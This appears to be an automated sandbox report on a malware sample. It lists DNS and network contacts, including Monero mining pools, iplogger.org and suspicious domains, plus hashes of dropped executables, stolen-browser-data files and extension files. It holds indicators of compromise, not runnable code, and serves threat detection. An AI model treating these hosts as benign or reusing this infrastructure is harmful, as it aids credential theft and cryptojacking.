US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 157.240.214.11:443 static.xx.fbcdn.net tcp
GB 157.240.214.11:443 static.xx.fbcdn.net tcp
GB 157.240.214.11:443 static.xx.fbcdn.net tcp
GB 157.240.214.11:443 static.xx.fbcdn.net udp
GB 157.240.214.11:443 static.xx.fbcdn.net udp
US 8.8.8.8:53 11.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 51.210.150.92:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 pastebin.com udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 92.150.210.51.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 162.19.224.121:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 121.224.19.162.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 0182d7dcdb4e1d8c87ef13ccca528b16
SHA1 f0f3d321a0829992d81bba5460abad5c555439cd
SHA256 1f4d8c3b8625c3506e6907a4e50e2f43cd851cbde208af218e50a9994b35388b
SHA512 f21c3d8792e805ef3aceaf294385c383e0db4964d36a51654f82b97a448349631a1b829e9602ca78e60caa89311d85a7b569636766521c9f2de167e28860beb9

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe

MD5 aaaf685d045b423d4d96ecaca344b4d5
SHA1 f2264a40421e66029db1cdf7fe8bb8ada2614862
SHA256 f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8
SHA512 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e

memory/396-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-54-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/396-53-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe

MD5 0f3487e49d6f3a5c1846cd9eebc7e3fc
SHA1 17ba797b3d36960790e7b983c432f81ffb9df709
SHA256 fa64075d63724c29bd96e172b3a59c4db6bc80462f8d4408b0676436958a4f1a
SHA512 fe5959d83d8d106675c8ca5ceb424648148ee812ce79f667b25439ef82bf2373fd08342b8d06e40c04e718209ef32a057804c80da0e3a7aac2d88f5ab29df37f

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe

MD5 e2213d70937e476e7a778f1712912131
SHA1 f8f09b6965c83c361210a1b11c8039b7ca9a30b9
SHA256 7312ff88c5eb0eb108cc0f04b91f871f59faed40d28cc5364ff456b0b063c37b
SHA512 cd97ff1cf43462b05461c3c5b3c2efe6aea8645968eae89c1936cf0f2657a05bbdcced863e1b68049c4b4624387f2b1d265257d5ce154053ecd31a032a74611f

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe

MD5 46e9d76672b9d24ba14ea963574cc6a2
SHA1 caf88d470dc1241aca2b159b26953194a8d59cca
SHA256 2f21e720e8fd2c591fdd52d7267370a2f0894bb4d3ca564392271cc025102ba7
SHA512 3e940ccdc588f0a284ce9c94106161845fb878c42db983b13fffbcac8c5620626ca58d745527309213716889546c4de4777c24f8c706dfe74ece7aa1772022c6

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe

MD5 77c7866632ae874b545152466fce77ad
SHA1 f48e76c8478a139ea77c03238a0499cfa1fc8cea
SHA256 e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43
SHA512 e1b1fad94981b2aa9d0aeb5b7f6d93a2f7f4c8305b05ea89ad66c35c6556ff2333e861c70fcad6953991d6dcbeea3031fed1d5791d99806423056c1c8dcd9ad8

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe

MD5 5c2e28dedae0e088fc1f9b50d7d28c12
SHA1 f521d9d8ae7381e3953ae5cf33b4b1b37f67a193
SHA256 2261a3d740572f9d0ee42faad5b0d405df16506e104bd912e7c7b24d7fddcc5f
SHA512 f6f100508acb77af5b3442673c9d01a6a16cc39521b618eebccd482bf9f50b3991109f82b97e48e8c3cc0221f0be9e164867ba79ac2f2bc4e25cbdb5f7daa15f

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

memory/396-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-47-0x0000000064940000-0x0000000064959000-memory.dmp

memory/396-46-0x0000000064941000-0x000000006494F000-memory.dmp

memory/396-45-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/396-44-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/396-43-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/396-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/396-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-49-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-48-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-41-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/1004-114-0x0000000000DA0000-0x0000000000DCC000-memory.dmp

memory/1452-103-0x0000000000970000-0x0000000000978000-memory.dmp

memory/1004-116-0x0000000001580000-0x0000000001586000-memory.dmp

memory/2708-117-0x0000000000070000-0x000000000015E000-memory.dmp

memory/4464-118-0x0000000000A10000-0x0000000000B52000-memory.dmp

memory/1004-120-0x0000000001590000-0x00000000015B0000-memory.dmp

memory/4464-122-0x0000000005450000-0x00000000054E2000-memory.dmp

memory/4464-121-0x0000000005920000-0x0000000005EC4000-memory.dmp

memory/1004-123-0x00000000015B0000-0x00000000015B6000-memory.dmp

memory/4464-125-0x0000000005770000-0x000000000580C000-memory.dmp

memory/4464-124-0x0000000005410000-0x000000000541A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2968-138-0x0000000000A00000-0x0000000000A10000-memory.dmp

memory/2488-149-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/1516-162-0x00000000009D0000-0x0000000000AB4000-memory.dmp

memory/396-172-0x0000000000400000-0x0000000000BD8000-memory.dmp

memory/396-181-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/396-180-0x0000000064940000-0x0000000064959000-memory.dmp

memory/396-179-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/396-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/396-176-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2936-182-0x0000000000400000-0x0000000002C6D000-memory.dmp

memory/4464-183-0x0000000001400000-0x0000000001412000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Login Data For Account

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 b50765fc873de01b9b93ef8908a5cf55
SHA1 0901ef992a9e9ddd54ee41f87cfbb86b1755ea1d
SHA256 ad7f3e95c541c12a952b76631045e63f1ea53d414b4273df5226c85c218cf1df
SHA512 7ca11d4aa67ef7f39848ed768d5bf5996857aaf78992b3d73cd932b8c5682f5f84afaab14da4a43cda01398c1c87895f02bb135803bffef2130e09bb88b58be1

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\000003.log

MD5 891a884b9fa2bff4519f5f56d2a25d62
SHA1 b54a3c12ee78510cb269fb1d863047dd8f571dea
SHA256 e2610960c3757d1757f206c7b84378efa22d86dcf161a98096a5f0e56e1a367e
SHA512 cd50c3ee4dfb9c4ec051b20dd1e148a5015457ee0c1a29fff482e62291b32097b07a069db62951b32f209fd118fd77a46b8e8cc92da3eaae6110735d126a90ee

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

memory/1828-389-0x0000000000400000-0x0000000002CC9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json

MD5 f0b8f439874eade31b42dad090126c3e
SHA1 9011bca518eeeba3ef292c257ff4b65cba20f8ce
SHA256 20d39e65b119ed47afd5942d2a67e5057e34e2aef144569796a19825fea4348e
SHA512 833e3e30f091b4e50364b10fc75258e8c647ddd3f32d473d1991beda0095827d02f010bf783c22d8f8a3fa1433b6b22400ad93dc34b0eb59a78e1e18e7d9b05f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\aes.js

MD5 4ff108e4584780dce15d610c142c3e62
SHA1 77e4519962e2f6a9fc93342137dbb31c33b76b04
SHA256 fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a
SHA512 d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\jquery-3.3.1.min.js

MD5 a09e13ee94d51c524b7e2a728c7d4039
SHA1 0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae
SHA256 160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef
SHA512 f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\mode-ecb.js

MD5 23231681d1c6f85fa32e725d6d63b19b
SHA1 f69315530b49ac743b0e012652a3a5efaed94f17
SHA256 03164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a
SHA512 36860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\pad-nopadding.js

MD5 0f26002ee3b4b4440e5949a969ea7503
SHA1 31fc518828fe4894e8077ec5686dce7b1ed281d7
SHA256 282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d
SHA512 4290a1aee5601fcbf1eb2beec9b4924c30cd218e94ae099b87ba72c9a4fa077e39d218fc723b8465d259028a6961cc07c0cd6896aa2f67e83f833ca023a80b11

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\content.js

MD5 dd274022b4205b0da19d427b9ac176bf
SHA1 91ee7c40b55a1525438c2b1abe166d3cb862e5cb
SHA256 41e129bb90c2ac61da7dac92a908559448c6448ba698a450b6e7add9493739c6
SHA512 8ee074da689a7d90eca3c8242f7d16b0390b8c9b133d7bbdef77f8bf7f9a912e2d60b4a16f1c934f1bd38b380d6536c23b3a2f9939e31a8ef9f9c539573387b4

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\background.js

MD5 2098797393986a512c91cc3508a6a1d3
SHA1 d0b403c8b63d4ae203c71a4f2aa868d4099fb059
SHA256 4f7c1f1bb05ee85f65f3263a5cb353d04cc574013ed0f17640642ce2c953be33
SHA512 faf434ccb8eac865601ab86585b483a423f6d9949d0fd04635425c2c272fea901bb99dc7fbfc0a79a0fbeb59e30a2a2b48381b713a14399ee31b22effccc6bdb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\icon.png

MD5 c8d8c174df68910527edabe6b5278f06
SHA1 8ac53b3605fea693b59027b9b471202d150f266f
SHA256 9434dd7008059a60d6d5ced8c8a63ab5cae407e7152da98ca4dda408510f08f5
SHA512 d439e5124399d1901934319535b7156c0ca8d76b5aa4ddf1dd0b598d43582f6d23c16f96be74d3cd5fe764396da55ca51811d08695f356f12f7a8a71bcc7e45c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\background.html

MD5 9ffe618d587a0685d80e9f8bb7d89d39
SHA1 8e9cae42c911027aafae56f9b1a16eb8dd7a739c
SHA256 a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e
SHA512 a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\messages.json

MD5 91f5bc87fd478a007ec68c4e8adf11ac
SHA1 d07dd49e4ef3b36dad7d038b7e999ae850c5bef6
SHA256 92f1246c21dd5fd7266ebfd65798c61e403d01a816cc3cf780db5c8aa2e3d9c9
SHA512 fdc2a29b04e67ddbbd8fb6e8d2443e46badcb2b2fb3a850bbd6198cdccc32ee0bd8a9769d929feefe84d1015145e6664ab5fea114df5a864cf963bf98a65ffd9

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\index

MD5 95c07d8a71623f41508b2ff47ca82226
SHA1 d4ad0917270a5006f3be6ca2b19e003d2522ea23
SHA256 824639e8587bd6deccb361cd6ccf061e82b76e97745b4cdaf09cf22cf59f4452
SHA512 e0315b36ce709657de426e5f549864a1de635e86c174379d36757d7deb300a11ac40d5938a32f00e304a1a41c9e5f2eb7806296c898642ffc3b187041c9ad9a9

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\db

MD5 491de38f19d0ae501eca7d3d7d69b826
SHA1 2ecf6fcf189ce6d35139daf427a781ca66a1eba9
SHA256 e58156bca5288238d341f5249d3b6c91ab37cef515358953b435339100d0596a
SHA512 232f5df71e8ec35e500ac81aa54a87b3523fe8a32168096a2a76f08e5c7868100b3cdc5155786ead489aac440beee3f84ffa43d226a5b709c66012923b20c696

C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp

MD5 013b18b14247306181ec7ae01d24aa15
SHA1 5ce4cb396bf23585fbcae7a9733fe0f448646313
SHA256 edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44
SHA512 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94

C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp

MD5 54ad0d820f5eedc3ccb93a548fca33fc
SHA1 378ab33d0a1fa2ec748c893d68c279a2073dd2d7
SHA256 28e8d4844e25f157663e4e4a95e038dd0a5f27bc14f41ac40e74bb184401936b
